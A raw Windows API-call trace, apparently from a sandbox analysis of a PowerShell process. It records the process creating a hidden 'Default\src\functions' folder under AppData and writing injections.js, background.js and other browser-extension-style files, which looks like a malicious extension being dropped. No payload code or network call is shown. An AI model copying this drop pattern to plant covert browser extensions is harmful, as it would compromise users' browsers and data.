EtwEventActivityIdControl () returned 0x0 [0164.036] EtwEventActivityIdControl () returned 0x0 [0164.036] EtwEventActivityIdControl () returned 0x0 [0164.044] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default")) returned 0xffffffff [0164.085] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x21 [0164.085] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local", nBufferLength=0x21, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local", lpFilePart=0x0) returned 0x20 [0164.086] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x29 [0164.086] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default", nBufferLength=0x29, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default", lpFilePart=0x0) returned 0x28 [0164.086] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e1c0) returned 1 [0164.086] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default"), fInfoLevelId=0x0, lpFileInformation=0x5a0e484 | out: lpFileInformation=0x5a0e484*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0164.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e1bc) returned 1 [0164.086] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e1c0) returned 1 [0164.086] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default"), fInfoLevelId=0x0, lpFileInformation=0x5a0e484 | out: lpFileInformation=0x5a0e484*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0164.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e1bc) returned 1 [0164.086] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e1c0) returned 1 [0164.087] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), fInfoLevelId=0x0, lpFileInformation=0x5a0e484 | out: lpFileInformation=0x5a0e484*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0164.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e1bc) returned 1 [0164.087] CreateDirectoryW (lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default"), lpSecurityAttributes=0x0) returned 1 [0164.088] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x29 [0164.088] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default", nBufferLength=0x29, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default", lpFilePart=0x0) returned 0x28 [0164.094] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5a0db10, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.106] EtwEventActivityIdControl () returned 0x0 [0164.106] EtwEventActivityIdControl () returned 0x0 [0164.106] EtwEventActivityIdControl () returned 0x0 [0164.106] EtwEventActivityIdControl () returned 0x0 [0164.328] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.328] EtwEventActivityIdControl () returned 0x0 [0164.328] EtwEventActivityIdControl () returned 0x0 [0164.328] EtwEventActivityIdControl () returned 0x0 [0164.330] EtwEventActivityIdControl () returned 0x0 [0164.330] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.380] EtwEventActivityIdControl () returned 0x0 [0164.380] EtwEventActivityIdControl () returned 0x0 [0164.380] EtwEventActivityIdControl () returned 0x0 [0164.408] EtwEventActivityIdControl () returned 0x0 [0164.409] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.409] EtwEventActivityIdControl () returned 0x0 [0164.409] EtwEventActivityIdControl () returned 0x0 [0164.409] EtwEventActivityIdControl () returned 0x0 [0164.416] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions")) returned 0xffffffff [0164.416] EtwEventActivityIdControl () returned 0x0 [0164.417] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.417] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.417] EtwEventActivityIdControl () returned 0x0 [0164.417] EtwEventActivityIdControl () returned 0x0 [0164.417] EtwEventActivityIdControl () returned 0x0 [0164.422] EtwEventActivityIdControl () returned 0x0 [0164.422] EtwEventActivityIdControl () returned 0x0 [0164.422] EtwEventActivityIdControl () returned 0x0 [0164.423] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions")) returned 0xffffffff [0164.424] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2d [0164.424] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src", nBufferLength=0x2d, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src", lpFilePart=0x0) returned 0x2c [0164.424] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0164.424] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions", nBufferLength=0x37, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions", lpFilePart=0x0) returned 0x36 [0164.424] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e0b8) returned 1 [0164.424] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions"), fInfoLevelId=0x0, lpFileInformation=0x5a0e37c | out: lpFileInformation=0x5a0e37c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0164.424] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e0b4) returned 1 [0164.424] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e0b8) returned 1 [0164.424] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions"), fInfoLevelId=0x0, lpFileInformation=0x5a0e37c | out: lpFileInformation=0x5a0e37c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0164.425] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e0b4) returned 1 [0164.425] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e0b8) returned 1 [0164.425] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src"), fInfoLevelId=0x0, lpFileInformation=0x5a0e37c | out: lpFileInformation=0x5a0e37c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0164.425] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e0b4) returned 1 [0164.425] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e0b8) returned 1 [0164.425] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default"), fInfoLevelId=0x0, lpFileInformation=0x5a0e37c | out: lpFileInformation=0x5a0e37c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8368b360, ftCreationTime.dwHighDateTime=0x1d94ef4, ftLastAccessTime.dwLowDateTime=0x8368b360, ftLastAccessTime.dwHighDateTime=0x1d94ef4, ftLastWriteTime.dwLowDateTime=0x8368b360, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0164.425] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e0b4) returned 1 [0164.425] CreateDirectoryW (lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src"), lpSecurityAttributes=0x0) returned 1 [0164.427] CreateDirectoryW (lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions"), lpSecurityAttributes=0x0) returned 1 [0164.432] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0164.432] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions", nBufferLength=0x37, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions", lpFilePart=0x0) returned 0x36 [0164.433] EtwEventActivityIdControl () returned 0x0 [0164.433] EtwEventActivityIdControl () returned 0x0 [0164.433] EtwEventActivityIdControl () returned 0x0 [0164.433] EtwEventActivityIdControl () returned 0x0 [0164.548] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\injections.js", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x45 [0164.548] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\injections.js", nBufferLength=0x45, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\injections.js", lpFilePart=0x0) returned 0x44 [0164.549] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e67c) returned 1 [0164.549] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\injections.js" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions\\injections.js"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0164.549] GetFileType (hFile=0x36c) returned 0x1 [0164.550] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e678) returned 1 [0164.550] GetFileType (hFile=0x36c) returned 0x1 [0164.550] WriteFile (in: hFile=0x36c, lpBuffer=0x26787dc*, nNumberOfBytesToWrite=0x201, lpNumberOfBytesWritten=0x5a0e700, lpOverlapped=0x0 | out: lpBuffer=0x26787dc*, lpNumberOfBytesWritten=0x5a0e700*=0x201, lpOverlapped=0x0) returned 1 [0164.551] CloseHandle (hObject=0x36c) returned 1 [0164.554] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.554] EtwEventActivityIdControl () returned 0x0 [0164.554] EtwEventActivityIdControl () returned 0x0 [0164.554] EtwEventActivityIdControl () returned 0x0 [0164.555] EtwEventActivityIdControl () returned 0x0 [0164.556] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.557] EtwEventActivityIdControl () returned 0x0 [0164.557] EtwEventActivityIdControl () returned 0x0 [0164.557] EtwEventActivityIdControl () returned 0x0 [0164.558] EtwEventActivityIdControl () returned 0x0 [0164.559] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.559] EtwEventActivityIdControl () returned 0x0 [0164.559] EtwEventActivityIdControl () returned 0x0 [0164.559] EtwEventActivityIdControl () returned 0x0 [0164.566] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src")) returned 0x2010 [0164.567] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2d [0164.567] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src", nBufferLength=0x2d, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src", lpFilePart=0x0) returned 0x2c [0164.567] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e244) returned 1 [0164.567] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src"), fInfoLevelId=0x0, lpFileInformation=0x5a0e508 | out: lpFileInformation=0x5a0e508*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x839ab040, ftCreationTime.dwHighDateTime=0x1d94ef4, ftLastAccessTime.dwLowDateTime=0x839d11a0, ftLastAccessTime.dwHighDateTime=0x1d94ef4, ftLastWriteTime.dwLowDateTime=0x839d11a0, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0164.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e240) returned 1 [0164.567] EtwEventActivityIdControl () returned 0x0 [0164.568] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\background.js", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0164.568] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\background.js", nBufferLength=0x3b, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\background.js", lpFilePart=0x0) returned 0x3a [0164.568] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e6d8) returned 1 [0164.568] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\background.js" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\background.js"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0164.568] GetFileType (hFile=0x36c) returned 0x1 [0164.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e6d4) returned 1 [0164.569] GetFileType (hFile=0x36c) returned 0x1 [0164.569] WriteFile (in: hFile=0x36c, lpBuffer=0x268a770*, nNumberOfBytesToWrite=0x858, lpNumberOfBytesWritten=0x5a0e75c, lpOverlapped=0x0 | out: lpBuffer=0x268a770*, lpNumberOfBytesWritten=0x5a0e75c*=0x858, lpOverlapped=0x0) returned 1 [0164.570] CloseHandle (hObject=0x36c) returned 1 [0164.574] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.574] EtwEventActivityIdControl () returned 0x0 [0164.574] EtwEventActivityIdControl () returned 0x0 [0164.574] EtwEventActivityIdControl () returned 0x0 [0164.576] EtwEventActivityIdControl () returned 0x0 [0164.576] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.577] EtwEventActivityIdControl () returned 0x0 [0164.577] EtwEventActivityIdControl () returned 0x0 [0164.577] EtwEventActivityIdControl () returned 0x0 [0164.578] EtwEventActivityIdControl () returned 0x0 [0164.579] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.579] EtwEventActivityIdControl () returned 0x0 [0164.579] EtwEventActivityIdControl () returned 0x0 [0164.579] EtwEventActivityIdControl () returned 0x0 [0164.586] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions")) returned 0x2010 [0164.586] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0164.586] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions", nBufferLength=0x37, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions", lpFilePart=0x0) returned 0x36 [0164.586] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e244) returned 1 [0164.586] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions"), fInfoLevelId=0x0, lpFileInformation=0x5a0e508 | out: lpFileInformation=0x5a0e508*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x839d11a0, ftCreationTime.dwHighDateTime=0x1d94ef4, ftLastAccessTime.dwLowDateTime=0x83adbb40, ftLastAccessTime.dwHighDateTime=0x1d94ef4, ftLastWriteTime.dwLowDateTime=0x83adbb40, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0164.586] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e240) returned 1 [0164.587] EtwEventActivityIdControl () returned 0x0 [0164.587] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\tabs.js", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3f [0164.587] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\tabs.js", nBufferLength=0x3f, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\tabs.js", lpFilePart=0x0) returned 0x3e [0164.587] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e6d8) returned 1 [0164.587] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\tabs.js" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions\\tabs.js"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0164.588] GetFileType (hFile=0x36c) returned 0x1 [0164.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e6d4) returned 1 [0164.588] GetFileType (hFile=0x36c) returned 0x1 [0164.588] WriteFile (in: hFile=0x36c, lpBuffer=0x269d92c*, nNumberOfBytesToWrite=0x2f9, lpNumberOfBytesWritten=0x5a0e75c, lpOverlapped=0x0 | out: lpBuffer=0x269d92c*, lpNumberOfBytesWritten=0x5a0e75c*=0x2f9, lpOverlapped=0x0) returned 1 [0164.589] CloseHandle (hObject=0x36c) returned 1 [0164.593] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.594] EtwEventActivityIdControl () returned 0x0 [0164.594] EtwEventActivityIdControl () returned 0x0 [0164.594] EtwEventActivityIdControl () returned 0x0 [0164.595] EtwEventActivityIdControl () returned 0x0 [0164.596] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.596] EtwEventActivityIdControl () returned 0x0 [0164.596] EtwEventActivityIdControl () returned 0x0 [0164.596] EtwEventActivityIdControl () returned 0x0 [0164.598] EtwEventActivityIdControl () returned 0x0 [0164.598] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.598] EtwEventActivityIdControl () returned 0x0 [0164.598] EtwEventActivityIdControl () returned 0x0 [0164.598] EtwEventActivityIdControl () returned 0x0 [0164.605] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions")) returned 0x2010 [0164.605] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0164.605] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions", nBufferLength=0x37, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions", lpFilePart=0x0) returned 0x36 [0164.605] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e244) returned 1 [0164.605] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions"), fInfoLevelId=0x0, lpFileInformation=0x5a0e508 | out: lpFileInformation=0x5a0e508*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x839d11a0, ftCreationTime.dwHighDateTime=0x1d94ef4, ftLastAccessTime.dwLowDateTime=0x83b4df60, ftLastAccessTime.dwHighDateTime=0x1d94ef4, ftLastWriteTime.dwLowDateTime=0x83b4df60, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0164.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e240) returned 1 [0164.605] EtwEventActivityIdControl () returned 0x0 [0164.606] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\notifications.js", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x48 [0164.606] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\notifications.js", nBufferLength=0x48, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\notifications.js", lpFilePart=0x0) returned 0x47 [0164.606] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e6d8) returned 1 [0164.606] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\notifications.js" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions\\notifications.js"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0164.607] GetFileType (hFile=0x36c) returned 0x1 [0164.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e6d4) returned 1 [0164.607] GetFileType (hFile=0x36c) returned 0x1 [0164.607] WriteFile (in: hFile=0x36c, lpBuffer=0x26b0ca4*, nNumberOfBytesToWrite=0x2a1, lpNumberOfBytesWritten=0x5a0e75c, lpOverlapped=0x0 | out: lpBuffer=0x26b0ca4*, lpNumberOfBytesWritten=0x5a0e75c*=0x2a1, lpOverlapped=0x0) returned 1 [0164.608] CloseHandle (hObject=0x36c) returned 1 [0164.610] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.610] EtwEventActivityIdControl () returned 0x0 [0164.610] EtwEventActivityIdControl () returned 0x0 [0164.610] EtwEventActivityIdControl () returned 0x0 [0164.611] EtwEventActivityIdControl () returned 0x0 [0164.612] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.612] EtwEventActivityIdControl () returned 0x0 [0164.612] EtwEventActivityIdControl () returned 0x0 [0164.612] EtwEventActivityIdControl () returned 0x0 [0164.615] EtwEventActivityIdControl () returned 0x0 [0164.616] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.616] EtwEventActivityIdControl () returned 0x0 [0164.616] EtwEventActivityIdControl () returned 0x0 [0164.616] EtwEventActivityIdControl () returned 0x0 [0164.622] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default")) returned 0x2010 [0164.622] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x29 [0164.623] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default", nBufferLength=0x29, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: 